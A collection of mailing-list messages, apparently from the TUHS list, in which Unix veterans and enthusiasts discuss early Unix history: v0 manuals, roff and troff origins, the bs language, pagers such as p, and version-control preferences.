www.cs.dartmouth.edu/~doug/wallpaper.pdf. If you think you'd like
to see the source, just holler.
> he maybe should do Latex
Sadly, math journals often demand Latex, but I've also run into
journals that require Word. I wanted to submit the document above
to a cartography journal until I found out they were in the
Word camp. I was, however, able to convert it to Latex.
At one point the American Instutute of Physics took only roff
(and retypeset other manuscripts--in roff). I don't know what
their practice is q
now.
> Maybe v0 didn't have any manuals?
> I understand they weren't in roff anyways.
No manuals, true. But if there had been they would have been
in some version of roff, just as all Research Unix manuals were.
Doug
On Fri, 4 Oct 2019, Ken Thompson via TUHS wrote:
> no, it was tty model 33.
Changing the topic slightly ...
The scans for v0 code are in lowercase. I assume printed on TTY 37.
But why is the early PDP-7 code in lowercase?
I do see the B language code for "lcase" which converts to lowercase.
Maybe something like that was used?
(I think I saw a scan mistake showing a "B" which is probably an "8" due
to that. See pdp7-unix/src/cmd/bc.s "dab B i".)
I didn't see anything in historical login code or manuals about
upper versus lowercase.
Any experiences about upper versus lower case to share?
When did stuff get rewritten to have both cases in code?
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Several v0 manpages say 11/3/70
See
https://github.com/DoctorWkt/pdp7-unix/commit/14a2a9b10bd4f9c56217234afb321…
The commit message says
"I've borrowed the V1 manuals from
http://minnie.tuhs.org/cgi-bin/utree.pl?file=V1/man/man1
and changed them to reflect the PDP-7 utilities."
Where did that 1970 date come from? Was it just made up? (Notice it is
one year earlier, same day.) Maybe v0 didn't have any manuals? This was
just an exercise in learning PDP7-Unix better? I understand they weren't
in roff anyways.
Also ... what is the earliest known date where we have some
scanned/printed document?
https://www.tuhs.org/Archive/Distributions/Research/McIlroy_v0/
says "runs on the PDP-7 and -9 computers; a more
modern version, a few months old, uses the PDP-11."
but no specific date.
The earliest date I see is from the 1stEdman / Dennis_v1 docs of
November 3, 1971. That is a full set of docs. There must be something
prior to that date.
Anyone know of some early printed memo or other correspondence that
mentions the work?
Thanks,
Jeremy C. Reed
echo 'EhZ[h ^jjf0%%h[[Zc[Z_W$d[j%Xeeai%ZW[ced#]dk#f[d]k_d%' | \
tr '#-~' '\-.-{'
All, very off-topic for TUHS but you have a bounty of experience. If any
of you have Intel ia64 skills and/or fixing compiler back-end bugs, could
you contact me off-list? I'm writing a back-end for the SubC compiler and
I have 'one last bug'™ before it can compile itself, and I'm stuck.
Details at: https://minnie.tuhs.org/wktcloud/index.php/s/QdKZAqcBytoFBkQ/download?path=…
Thanks, Warren
I’ve seen it said a couple of places that the DG/UX kernel was an almost complete rewrite and rather well-done.
Have any details been preserved? There’s not a whole lot out there that I’ve been able to find about DG/UX or the AViiON workstation series (whether 88K or Intel x86).
-- Chris
PS - I’ve found that my asking around has prompted some people to put things online, so may as well keep asking in various places. :)
Ok. I know there was never a v6.5... officially. But there are several
references to that in different bits of the early user group news letters.
This refers to v6 plus all the patches that "leaked" out of bell Labs via
udel and Lou Katz.
My question is, have they survived? The story sure has, but I didn't find
them in the archive..
> From: Jeremy C. Reed
> "PDP-11 that had PDP-10 memory management, KS-1." ... What is this
> PDP-11 and KS-1? Maybe this is the PDP-11/20 with KS-11?
Yes. The reference to "PDP-10 memory management" is because apparently the
KS11 did what the PDP-10 MMU did, i.e. divide the address space into two
sections. (On the -10, one was for code, and one for data.)
Alas, next to nothing is known of the KS11, although I've looked. There's a
mention of it in "Odd Comments and Strange Doings in Unix":
https://www.bell-labs.com/usr/dmr/www/odd.html
but it doesn't say much.
Noel
I read in the PDP-7 reference manual that Precision CRT Display Type 30
and Precision Incremental Display Type 340 are the typical displays used
with the PDP-7, but aren't standard equipment. I read about the
Graphics-II scope. Was it the only display? I read it was used as a
second terminal and that it would pause per display full with a button
to continue.
I assume this second terminal's keyboard was TTY model 33 or similar
since it was the standard equipment. Does anyone know?
Do you know if the PDP-7 or early edition Unixes have pen support for
that Graphics-II or similar displays?
Clem has written that the PDP-7 had a disk from a PDP-9. Where is this
cited?
The ~1971 draft "The UNIX Time-Sharing System" says first version runs
on PDP-9 also.
https://www.tuhs.org/Archive/Distributions/Research/McIlroy_v0/
But I cannot find any other reference of running on PDP-9 at all. Was
this academic?
That draft calls the PDP-7 version the "first edition" but later the
PDP-11/20 is called the "first edition". When did the naming of first
edition get defined to not include the PDP-7 version? Or is it because
the early "0th" version was never released/shared outside?
Thompson interview
https://www.tuhs.org/Archive/Documentation/OralHistory/transcripts/thompson…
mentions an "interim machine" and a "PDP-11 that had PDP-10 memory
management, KS-1." What is this interim machine? Is this a PDP-11
without a disk (for a few months?) What is this PDP-11
and KS-1? Maybe this is the PDP-11/20 with KS-11?
Do we know what hardware was supported for the early editions? We don't
have all the kernel code and from a quick look from what is available I
didn't see specific hardware references.
The later ~1974 "The UNIX Time-Sharing System" paper does mention some
hardware at that time on the PDP-11/45 like a 201 dataset interface and
a Tektronix 611 storage-tube display on a satellite PDP-11/20.
When did a CRT with keyboard terminal like DEC vt01 (with Tektronix 611
CRT display), LS ADM-3, Hazeltine 2000, VT01A display with keyboard
(what keyboard?) get supported? Any code to help find this? (The
https://www.bell-labs.com/usr/dmr/www/picture.html does mention the
VT01A plys keyboard).
Thanks,
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Does anyone know where I can find the Unix-related interviews with Dr.
Peter Collinson?
These are acknowledged in front-matter of Peter Salus's Quarter Century
book which says previously appeared in ".EXE". Bottom of
https://www.hillside.co.uk/articles/index.html mentions the magazines
aren't found. I didn't try contacting him yet.
I have read the Mahoney collection (archived at TUHS). Any other
interview collections from long ago?
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Hi TUHS folks,
Earlier this month I did a fair bit of research on a little known Unix
programming language - bs - and updated the wikipedia pages
accordingly.
https://en.wikipedia.org/wiki/Bs_(programming_language)
Thanks for solving some bs mysteries goes to its author, Dick Haight,
as well as those that got us in touch: Doug McIlroy, Brian Kernighan,
and John Mashey.
Apart from what is in the aforementioned wikipedia page, in exchanging
email with me, Dick shared:
q(
I wrote bs at the time Unix (V 3?) and all of the commands were being
converted from assembler to C. So Thompson’s bas became my bs — sort
of. I included snobol’s succeed/fail feature (? Operator/fail return).
[...]
No one asked me to write bs. [...] I tried to get Dennis Ritche to add
something like “? / fail” to C but he didn’t. This is probably part of
why I wrote bs. I wasn’t part of the Unix inner circle (BTL Computing
Research, e.g., Thompson, Ritchie, McIlroy, etc). Neither were Mashey
& Dolotta. We were “support”.
)
The Release 3.0 manual (1980) mentions bs prominently on page 9:
Writing a program. To enter the text of a source program into a
UNIX file, use ed(1). The four principal languages available under
UNIX are C (see cc(1)), Fortran (see f77(1)), bs (a
compiler/interpreter in the spirit of Basic, see bs(1)), and assembly
language (see as(1)).
Personally, some reasons I find bs noteworthy is (a) it is not much
like BASIC (from today's perspective) and (b) as mentioned in the
wikipedia page, "The bs language is a hybrid interpreter and compiler
and [an early] divergence in Unix programming" (from Research Unix
mentioning only the other three languages):
q(
The bs language was meant for convenient development and debugging of
small, modular programs. It has a collection of syntax and features
from prior, popular languages but it is internally compiled, unlike a
Shell script. As such, in purpose, design, and function, bs is a
largely unknown, modest predecessor of hybrid interpreted/compiled
languages such as Perl and Python.
)
It survives today in some System III-derived or System V-derived
commercial operating systems, including HP-UX and AIX.
If you have additional information that might be useful for the
wikipedia page, please do share it.
Peace,
Dave
P.S. Here is a 2008 TUHS list discussion, "Re: /usr/bin/bs on HPUX?":
On Wed, Dec 10, 2008 at 01:08:26PM -0500, John Cowan wrote:
> Lord Doomicus scripsit:
>
> > I was poking around an HP UX system at work today, and noticed a
> > command I've never noticed before ... /usr/bin/bs.
> >
> > I'm sure it's been there for a long time, even though I've been an
> > HPUX admin for more than a decade, sometimes I'm just blind ... but
> > anyway ....
> >
> > I tried to search on google ... it looks like only HPUX, AIX, and
> > Maybe AU/X has it. Seems to be some kind of pseudo BASIC like
> > interpreter.
>
> That's just what it is. Here are the things I now know about it.
>
> 0. The string "bs" gets an awful lot of false Google hits, no matter
> how hard you try.
>
> 1. "bs" was written at AT&T, probably at the Labs, at some time between
> the release of 32V and System III. It was part of both System III and
> at least some System V releases.
>
> 2. It was probably meant as a replacement for "bas", which was a more
> conventional GW-Basic-style interpreter written in PDP-11 assembly
> language. (32V still had the PDP-11 source, which of course didn't work.)
>
> 3. At one time System III source code was available on the net,
> including bs.c and bs.1, but apparently it no longer is. I downloaded
> it then but don't have it any more.
>
> 4. I was able to compile it under several Unixes, but it wouldn't run:
> I think there must have been some kind of dependency on memory layout,
> but never found out exactly what.
>
> 5. I remember from the man page that it had regular expressions, and
> two commands "compile" and "execute" that switched modes to storing
> expressions and executing them on the spot, respectively. That eliminated
> the need for line numbers.
>
> 6. It was apparently never part of Solaris.
>
> 7. It was never part of any BSD release, on which "bs" was the battleships
> game.
>
> 8. I can't find the man page on line anywhere either.
>
> 9. The man page said it had some Snobol features. I think that meant
> the ability to return failure -- I vaguely remember an "freturn" command.
>
> 10. 99 Bottles of Beer has a sample bs program at
> http://www2.99-bottles-of-beer.net/language-bs-103.html .
>
> 11. If someone sends me a man page, I'll consider reimplementing it as
> Open Source.
>
> --
> We are lost, lost. No name, no business, no Precious, nothing. Only empty.
> Only hungry: yes, we are hungry. A few little fishes, nassty bony little
> fishes, for a poor creature, and they say death. So wise they are; so just,
> so very just. --Gollum cowan at ccil.orghttp://ccil.org/~cowan
--
dave(a)plonka.us http://www.cs.wisc.edu/~plonka/
> From: "Brian L. Stuart"
> (The tmg doc was one I remember not being there.)
Err, TMG(VI) is 1/2 page long. Is that really what you were looking for?
(I _did_ specify the 'UPM'.)
I do happen to have the V6-era TMG _manual_, if that's what you're looking
for.
Noel
All, I'm just musing where is the best place to store Unix documentation.
My Unix Archive is really just a filesystem, so it's not so good to
capture and search metadata.
Is anybody using archive.org, gunkies or something else, and have
recommendations?
Cheers, Warren
I'm looking for complete compies of UNIX NEWS volumes 1-7. 8 and newer are
available on the USENIX site, or on archive.org, but older ones are not. A
few excerpts are published in newer login issues, but nothing complete.
Reading the AUUGN issues, especially the early ones, are quite enlightening
and help one judge the relative merits of later accounts with better
contemporary context. I was hoping to get the same from UNIX NEWS (later
login) and any other news letters that may exist from the time (I think I
spotted references to one from the UK in AUUGN). It's really quite
enlightening.
Warner
Hello All.
Believed lost in the mists of time for over 30 years, the Georgia Tech
Software Tools Subsystem for Prime Computers, along with the Georgia Tech
C Compiler for Prime Computers, have been recovered!
The source code and documentation (and binary files) are available in a
Github repo: https://github.com/arnoldrobbins/gt-swt.
The README.md there provides some brief history and credits with respect
to the recovery, and w.r.t. the subsystem and C compilers themselves.
Credit to Scott Lee for making and keeping the tapes and driving the
recovery process, and to Dennis Boone and yours truly for contributing
financially. I set up the repo.
For anyone who used and/or contributed to this software, we hope you'll
enjoy this trip down memory lane.
Feel free to forward this note to interested parties.
Enjoy,
Arnold Robbins
(On behalf of the swt recovery team. :-)
Hello All.
I have revived the 10th edition spell(1) program, allowing it to compile
and run on "modern" systems.
See https://github.com/arnoldrobbins/v10spell ; the README.md gives
an overview of what was done.
Enjoy!
Arnold
Greetings!
As a project for our university's seminar on the PDP-8 I wrote a
compiler for the B language targeting it. It's a bit rough around
the edges and the runtime code needs some work (division and
remainder are missing), but it does compile B code correctly,
generating acceptable code (for my taste, though the function call
sequence could be better).
I hope some of you enjoy this compiler for an important historical
language for an important historical computer (makes me wonder why
the two weren't married before).
https://github.com/fuzxxl/8bc
Yours,
Robert Clausecker
--
() ascii ribbon campaign - for an 8-bit clean world
/\ - against html email - against proprietary attachments
https://2019.eurobsdcon.org/livestream-soria-moria/
Has a live stream. My talk is at 1230 UTC or just under 2 hours. There will
be a recording I think that I'll be able to share with you in a day or
three.
Warner
Hi!
Is there a public OpenSolaris Git/CVS/SVN ?
The openloaris.org site is down.
AFIK the first sources set (not complete) was published around June 2005.
The latest available sources were b135 March 2010
(available at TUHS)
https://www.tuhs.org/cgi-bin/utree.pl?file=OpenSolaris_b135
It would be interesting to see an evolution of "pure" SysV R4.
--
-=AV=-
Larry McVoy:
If you have something like perl that needs a zillion sub pages, info
makes sense. For just a man page, info is horrible.
=====
This pokes me in one of my longest-standing complaints:
Manual entries, as printed by man and once upon a time in
the Programmers' Manual Volume 1, should be concise references.
They are not a place for tutorials or long-winded descriptions
or even long lists of hundreds of options (let alone descriptions
of why the developer thinks this is the neatest thing since
sliced bread and what bread he had in his sandwiches that day).
For many programs, one or two pages of concise reference is
all the documentation that's needed; no one needs a ten-page
tutorial on how to use cat or rm or ls, for example. But some
programs really do deserve a longer treatment, either a tutorial
or an extended reference with more detail or both. Those belong
in separate documents, and are why the Programmers' Manual had
a second volume.
Nowadays people think nothing of writing 68-page-long manual
entries (real example from something I'm working with right now)
that are long, chatty lists of options or configuration-file
directives with tutorial information interspersed. The result
makes the developer feel good--look at all the documentation
I've written!!--but it's useless for someone trying to figure
out how to write a configuration file for the first time, and
not so great even for someone trying to edit an existing one.
Even the Research system didn't always get this right; some
manual entries ran on and on and on when what was really
needed was a concise list of something and a longer accompanying
document. (The Tenth Edition manual was much better about
that, mostly because of all the work Doug put in. I doubt
there has ever been a better editor for technical text than
Doug.) But it's far worse now in most systems, because
there's rarely any editor at all; the manuals are just an
accreted clump.
And that's a shame, though I have no suggestions on how
to fix it.
Norman Wilson
Toronto ON
Clem Cole:
Exactly!!!! That's what Eric did when he wrote more(ucb) - he *added to
Unix*. The funny part was that USG thought more(ucb) was a good idea and
then wrote their own, pg(att); which was just as arrogant as the info
behavior from the Gnu folks!!!
======
And others wrote their own too, of course. The one I know
best is p(1), written by Rob Pike in the late 1970s at the
University of Toronto. I encountered at Caltech on the
system Rob had set up before leaving for Bell Labs (and
which I cared for and hacked on for the next four years
before following him). By the time I reached BTL it was
a normal part of the Research system; I believe it's in
all of the Eighth, Ninth, and Tenth Edition manuals.
p is interesting because it's so much lighter-weight, and
because it has rather a different interior design:
Rather than doing termcappy things, p just prints 22 lines
(or the number specified in an option), then doesn't print
the newline after the 22nd line. Hit return and it will
print the next 22 lines, and so on. The resulting text just
flows up the glass-tty screen without any fuss, cbreak, or
anything. (I believe the first version predated V7 and
therefore cbreak.)
Why 22 lines instead of 24, the common height of glass ttys
back then? Partly because that means you keep a line or two
of context when advancing pages, making reading simpler.
But also because in those days, a standard page destined for
a printer (e.g. from pr or nroff, and therefore from man) was
66 lines long. 22 evenly divides 66, so man something | p
never gives you a screen spanning pages.
p was able to back up: type - (and return) instead of just
return, and it reprints the previous 22-line page; -- (return)
the 22 lines before that; and so on. This was implemented
in an interesting and clever way: a wrapper around the standard
I/O library which kept a circular buffer of some fixed number
of characters (8KiB in early versions, I think), and a new
call that, in effect, backed up the file pointer by one character
and returned the character just backed over. That made it easy
to back over the previous N lines: just make that call until
you've seen N newlines, then discard the newline you've just
backed over, and you're at the beginning the first line you want
to reprint.
As I vaguely recall, more was able to back up, but only when
reading from a real file, not a pipeline. p could do (limited
but sufficient) backup from a pipeline too.
As a creature of its pre-window-system era, you could also type
!command when p paused as well.
I remember being quite interested in that wrapper as a
possible library for use in other things, though I never
found a use for it.
I also remember a wonderful Elements-of-Programming-Style
adventure with Rob's code. I discovered it had a bug under some
specific case when read returned less than a full bufferful.
I read the code carefully and couldn't see what was wrong.
So I wrote my own replacement for the problematic subroutine
from scratch, tested it carefully in corner cases, then with
listings of Rob's code and mine side-by-side walked through
each with the problem case and found the bug.
I still carry my own version of p (rewritten from scratch mainly
to make it more portable--Rob's code was old enough to be too
clever in some details) wherever I go; ironically, even back to
U of T where I have been on and off for the past 30 years.
more and less and pg and the like are certainly useful programs;
for various reasons they're not to my taste, but I don't scorn
them. But I can't help being particular fond of p because it
taught me a few things about programming too.
Norman Wilson
Toronto ON
KatolaZ:
> We can discuss whether the split was necessary or "right" in the first
> instance, as we could discuss whether it was good or not for cat(1) to
> leave Murray Hill in 1979 with no options and come back from Berkley
> with a source code doubled in size and 9 options in 1982.
We needn't discuss that (though of course there are opinions and
mine are the correct ones), but in the interest of historic accuracy,
I should point out by 1979 (V7) cat had developed a single option -u
to turn off stdio buffering.
Sometime before 1984 or so, that option was removed, and cat was
simplified to just
while ((n = read(fd, buf, sizeof(buf))) > 0)
write(1, buf, n)
(error checking elided for clarity)
which worked just fine for the rest of the life of the Research
system.
So it's true that BSD added needless (in my humble but correct
opinion) options, but not that it had none before they touched it.
Unless all those other programs were stuffed into cat in an earlier
Berkeley system, but I don't think they were.
Norman Wilson
Toronto ON
(Three cats, no options)
Arthur Krewat:
Which is better, creating a whole new binary to put in /usr/bin to do a
single task, or add a flag to cat?
Which is better, a proliferation of binaries w/standalone source code,
or a single code tree that can handle slightly different tasks and save
space?
======
Which is simpler to write correctly, to debug, and to maintain:
a simple program that does a single task, or a huge single program
with lots of tasks mashed together?
Which is easier to understand and use, individual programs each
with a few options specialized to a particular task, or a monolith
with many more options some of which apply only to one task or
another, others to all?
What are you trying to optimize for? The speed with which
programmers can churn out yet another featureful utility full
of bugs and corner cases, or the ease with which the end-user
can figure out what tool to use and how to use it?
Norman Wilson
Toronto ON
I fear we're drifting a bit here and the S/N ratio is dropping a bit w.r.t
the actual history of Unix. Please no more on the relative merits of
version control systems or alternative text processing systems.
So I'll try to distract you by saying this. I'm sitting on two artifacts
that have recently been given to me:
+ by two large organisations
+ of great significance to Unix history
+ who want me to keep "mum" about them
+ as they are going to make announcements about them soon *
and I am going slowly crazy as I wait for them to be offically released.
Now you have a new topic to talk about :-)
Cheers, Warren
* for some definition of "soon"
OK. I'm totally confused, and I see contradictory information around. So I
thought I'd ask here.
PWB was started to support unix time sharing at bell labs in 1973 (around
V4 time).
PWB 1.0 was released just after V6 "based on" it. PWB 2.0 was released just
after V7, also "based on it". Later Unix TS 3.0 would become System III. We
know there was no System I or System II. But was there a Unix TS 1.0 and
2.0? And were they the same thing as PWB 1.0 and 2.0, or somehow just
closely related? And I've seen both Unix/TS and Unix TS. Is there a
preferred spelling?
Thanks for all your help with this topic and sorting things out. It's been
quite helpful for my talk in a few weeks.
Warner
P.S. Would it be inappropriate to solicit feedback on an early version of
my talk from this group? I'm sure they would be rather keener on catching
errors in my understanding of Unix history than just about any other
forum...
Hello TUHS on Tues.,
Warren Toomey suggested I let the group know about a utility that exists at least for iMacs and IOS devices.
It’s called “cathode” and you can find it on the Apple App Store. Please forgive me if this has already been mentioned.
This utility provides for an xterm window that looks like the display an old *tube. You can set the curvature of the glass, the glow, various scan techniques, 9600 speed, and so on.
It adds that extra dimension to give the look and feel of working on early UNIX with a tube.
I would love to see profiles created that match actual ttys. My favorite tube is the Wyse 50. Another, one I remember is a Codex model with “slowopen” set in vi.
Remember how early UNIX terminals behaved with slowopen, right? The characters would overtype during insert mode in vi, but when you hit escape, the line you just clobbered reappears shifting the remaining text as appropriate to the right.
Cathode adds a little spice, albeit artificially, to the experience of early UNIX.
Truly,
Bill Corcoran
(*) For the uninitiated, we used to call the tty terminal a “tube.” For example, you might hear my boss say, “Corcoran, that cheese you hacked yesterday launched a runaway that’s now soaking the client’s CPU. Go jump on a free tube and fix it now!”
Noel Chiappa wrote:
> > From: Doug McIlroy
>
> > the absence of multidemensional arrays in C.
>
>?? From the 'C Reference Manual' (no date, but circa 'Typesetter C'), pg. 11:
>
> "If the unadorned declarator D would specify an n-dimensional array .. then
> the declarator D[in+1] yields an (n+1)-dimensional array"
>
>
>I'm not sure if I've _ever_ used one, but they are there.
Yes, C allows arrays of arrays, and I've used them aplenty.
However an "n-dimensional array" has one favored dimension,
out of which you can slice an array of lower dimension. For
example, you can pass a row of a 2D array to a function of a
1D variable, but you can't pass a column. That asymmetry
underlies my assertion. In Python, by contrast, n-dimensional
arrays can be sliced on any dimension.
Doug
> Excellent - thanks for the pointer. This shows nroff before troff.
> FWIW: I guess I was miss informed, but I had been under the impression
> that was the other way around. i.e. nroff was done to be compliant with
> the new troff, replacing roff, although the suggestion here is that he
> wrote it add macros to roff. I'll note that either way, the dates are all
> possible of course because the U/L case ASR 37 was introduced 1968 so by
> the early 1970's they would have been around the labs.
nroff was in v2; troff appeared in v4, which incidentally was
typeset in troff.
Because of Joe Ossanna's role in designing the model 37, we
had 37's in the Labs and even in our homes right from the
start of production. But when they went obsolete, they were
a chore to get rid of. As Labs property, they had to be
returned; and picking them up was nobody's priority.
Andy Hall had one on his back porch for a year.
Doug
> From: Doug McIlroy
> the absence of multidemensional arrays in C.
?? From the 'C Reference Manual' (no date, but circa 'Typesetter C'), pg. 11:
"If the unadorned declarator D would specify an n-dimensional array .. then
the declarator D[in+1] yields an (n+1)-dimensional array"
I'm not sure if I've _ever_ used one, but they are there.
Noel
A major topic on this list has been the preservation of computer
history, through museums that collect and operate old hardware,
software emulation of past hardware and software systems, and data
recovery from newly discovered, but previously thought to be lost,
archives.
I came across an article today about another major industry that has
been exceedingly careless about preserving its history:
Wipe Out: When the BBC Kept Erasing Its Own History
https://getpocket.com/explore/item/wipe-out-when-the-bbc-kept-erasing-its-o…
It is a must-read for Dr Who fans on this list.
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
---------------------------------
>
> Though the vi clone with the best name was, indisputably, elvis.
>
unfortunately unmaintained.
elvis has a smaller memory footprint, and a more pleasant (nroff later html) based help support than vim. There are no plugin, vimscript feature sas well as no python/perl support. I'm interested in a vi with syntax coloring and help support, however I don't need scripting features. Therefore I hope someone will take over maintenance, as I'm too old for tha
> The "block copy in an editor" thing is something which has intrigued
> me for years. poor old ed/ex/vi just couldn't do it, and for the life
> of me, I could not understand why this was "deprecated" by the people
> writing that family of editors.
One might trace it to the founding tenet that a file is a stream of bytes,
reinforced by the absence of multidemensional arrays in C. But it goes
deeper than that.
Ed imposes a structure, making a (finite) file into an array, aka list,
of lines. It's easy to define block moves and copies in a list. But
what are the semantics of a block move, wherein one treats the list
as a ragged-right 2D array? What gets pushed aside? In what direction?
How does a block move into column that not all destination rows
reach? How do you cope when the bottom gets ragged? How about the
top? Can one move blocks of tab-separated fields?
I think everyone has rued the lack of block operations at one time
or another. But implementing them in any degree of generality is a
stumbling block. What should the semantics be?
> Similarly the 'repeat this sequence of commands' thing which emacs had.
Ed's g command does that, except the sequence can't contain another g.
Sam, barely harder than ed to learn, cures that deficiency and generalizes
in other ways, too--but has no block operations.
Doug
Peter Jeremy:
> NFS ran much faster when you turned off the UDP checksums as well.
> (Though there was still the Ethernet CRC32).
Dave Horsfall:
Blerk... That just tells you that the packet came across the wire more or
less OK.
=====
UDP (and TCP) checksums are nearly useless against
the sort of corruption Larry described. Since they
are a simple addition with carry wraparound, you
can insert or remove any number of word-aligned pairs
of zero octets without the checksum changing.
I discovered this the hard way, while tracking down
a kernel bug that caused exactly that sort of corruption.
Does IPv6 require a meaningful checksum, or just the
useless old ritual one?
Norman Wilson
Toronto ON
Sorry, i said "yes" to the false question.
--- Forwarded from Steffen Nurpmeso <steffen(a)sdaoden.eu> ---
Date: Mon, 16 Sep 2019 21:12:28 +0200
From: Steffen Nurpmeso <steffen(a)sdaoden.eu>
To: chet.ramey(a)case.edu
Subject: Re: [TUHS] earliest Unix roff
Message-ID: <20190916191228.1YQHs%steffen(a)sdaoden.eu>
OpenPGP: id=EE19E1C1F2F7054F8D3954D8308964B51883A0DD; url=https://ftp.sdaoden.eu/steffen.asc; preference=signencrypt
Chet Ramey wrote in <95916cf9-9aa1-f949-0f37-0ae466e38aa2(a)case.edu>:
|On 9/16/19 8:10 AM, Clem Cole wrote:
|> I use the standalone Info reader (named info) if I want to look \
|> at the
|> Info output.
|>
|> Fair enough, but be careful, while I admit I have not looked in a while,
|> info(gnu) relies on emacs keybindings and a number of very emacs'ish th\
|> ings.
|> Every time I have tried to deal with it, I have unprogram my fingers and
|> reset them to emacs.
|>
|> If it would have used more(1) [or even less(1)] then I would not \
|> be as annoyed.
|
|It seems to me that the strength of info (the file format and program) is
|the navigation of a menu-driven hierarchical document containing what are
|essentially selectable links between sections. Something like more or less
|is poorly suited to take advantage of those features.
But you can do that in man macros with a normal pager like
less(1), too. I mean, i may bore people, but yes i have written
a macro extension for the mdoc macros which can be used to
generate a TOC, and which generates document local as well as
links to external manual pages. This works for all output
formats, but particularly well for those which support links
themselves, HTML, PDF as well as grotty, the TTY output device of
groff. There was a feature request, but it has not been included
yet. (My own port of roff where it will ship out of the box i just
do not find time for, but i said to myself that after having
banged my head a thousand times against the wall of a totally
f....d up software code base, if i maintain yet another free
software project then this time i do not release anything until
i can say i am ready.)
You can see the manual page online if you want to, it is at [1]
(and itself the HTML output of a manual which uses the macro).
Nothing magic, it is just that the grotty device then uses
backspace escape sequences not only to embolden or otherwise
format text, but also to invisibly embed content information.
And a patched less(1) can search for these specially crafted
backspace sequences easily, in fact i use that each and every time
when i look at the manual page of the MUA i maintain, which is
even longer than the bash manual. The patch for less is pretty
small, even though it cares for less conventions:
#?0|kent:less.tar_bomb_git$ git diff master..mdocmx|wc -l
413
[1] https://www.sdaoden.eu/code-mdocmx.html
It has the deficite of not being able to dig macros as part of
headers, e.g. "HISTORY ON less(1)" where less(1) would be an
external link, this cannot work out the way the mdoc macros are
implemented in groff. They would need to become rewritten, but no
time for that yet. Other than that it works just fine for half
a decade, for development i have
mdoc() (
MDOCMX_ENABLE=1
\export MDOCMX_ENABLE
\: ${MDOCMXFLAGS:=-dmx-toc-force=tree}
\mdocmx.sh "${1}" |
\s-roff -Tutf8 -mdoc ${MDOCMXFLAGS} |
LESS= \s-less --RAW-CONTROL-CHARS --ignore-case --no-init
)
where s-roff and s-less are the patched version. This is the
development version, the nice property of mdocmx is that the
preprocessing step can be shipped, in fact it is for half
a decade, too. For such manuals you only need grotty/less to be
patched. So then in in less i hit ^A and will be asked
[anchor]:
then i enter the number and it scrolls into view. And ' will
scroll back to where you have been before following the internal
link. Likewise, if the entered number links an external manual
page you first see
Read external manual: !man 1 sh
and if you hit return, you go there, temporarily suspending the
current less. (This external thing is actually a compile time
option.) So this is all i need, and it would be very nice to have
this possibility much more often.
Well. The mandoc project has an option to generate links for
manual pages on best guess, too. This works surprisingly well,
and does not need a patch for less as it generates the usual tag
files that you all know about. It cannot support exact anchor
support, of course, and TOC generation it does not have too,
i think.
But anyway: it is possible.
|You need a way to position the cursor with more flexibility than more gives
|you.
--steffen
|
|Der Kragenbaer, The moon bear,
|der holt sich munter he cheerfully and one by one
|einen nach dem anderen runter wa.ks himself off
|(By Robert Gernhardt)
-- End forward <20190916191228.1YQHs%steffen(a)sdaoden.eu>
--steffen
|
|Der Kragenbaer, The moon bear,
|der holt sich munter he cheerfully and one by one
|einen nach dem anderen runter wa.ks himself off
|(By Robert Gernhardt)
> I'd love to see the docs on that early stuff and see if Joe Ossanna
> added in his own magic or was he carrying forward earlier magic.
Here are scans of non-unix roff in 1971: https://www.cs.dartmouth.edu/~doug/roff71/roff71
I also have 1969, but it's bedtime and that will have to wait.
Relative numbers (+n), roman numerals, .ti, top and bottom margin settings,
.po, running titles, tab settings, hyphenation and footnotes were not in
Saltzer's runoff. Most other features were.
Doug
I found the following in the archive:
To: cbunix23(a)yahoo.com
Cc: Warren(a)plan9.bell-labs.com, Toomey(a)plan9.bell-labs.com,
<wkt(a)tuhs.org>
Subject: Re: cb/unix tapes
From: Dennis Ritchie <dmr(a)plan9.bell-labs.com>
Date: Tue, 15 Jul 2003 21:23:37 -0400
They've arrived on my doorstep; thanks, Larry.
9-track drives seem thin on the ground, but we'll
see.
Dennis
Does anybody know what became of those tapes? I know it was 13 years ago,
but it's one of the few sitings of CB-Unix tapes I could find...
Warner
Well, if we're going to get into editor, erm, version-control wars,
I'll state my unpopular opinion that SCCS and RCS were no good at
all and CVS only pretended to be any good. Subversion was the first
system I could stand using.
The actual basis for that opinion (and it's just my opinion but it's
not pulled out of hyperspace) is that the older systems think only
about one file at a time, not collections of files. To me that's
useless for any but the most-trivial programming (and wasn't
non-trivial programming what spurred such systems?). When I am
working on a non-trivial program, there's almost always more than
one source file, and to keep things clean often means refactoring:
splitting one file into several, merging different files, removing
files that contain no-longer-useful junk, adding files that
implement new things, renaming files.
A revision-control system that thinks only about one file at a
time can't keep track of those changes. To me that makes it
worse than useless; not only can it not record a single
commit with a single message and version number when files
are split and combined, it requires extra work to keep all
those files under version control at all.
CVS makes an attempt to handle those things, but the effect
is clunky in practice compared to successors like svn.
One shouldn't underestimate the importance of a non-clunky
interface. In retrospect it seems stupid that we didn't have
some sort of revision control discipline in Research UNIX, but
given the clunkiness of SCCS and RCS and CVS, there's no way
most of us would have put up with it. Given that we often had
different people playing with the same program concurrently,
it would have taken at least CVS to meet our needs anyway.
Norman `recidivist' Wilson
Toronto ON
George Michaelson writes:
> What Larry and the other RCS haters forget is that back in the day,
> when we all had more hair, RCS was --->FAST<--- and SCCS was S.L.O.W.
>
> because running forward edits on a base state of 1000 edits is slow.
> Since the majority action is increment +1 on the head state the RCS
> model, whilst broken in many ways
> was FAST
>
> -G
And also that RCS had a much friendlier interface.
John Reiser did do his own paging system for UNIX 32/V.
I heard about it from friends at Bell Labs ca. 1982-83,
when I was still running systems for physicists at Caltech.
It sounded very interesting, and I would love to have had
my hands on it--page cache unified with buffer cache,
copy-on-write from the start.
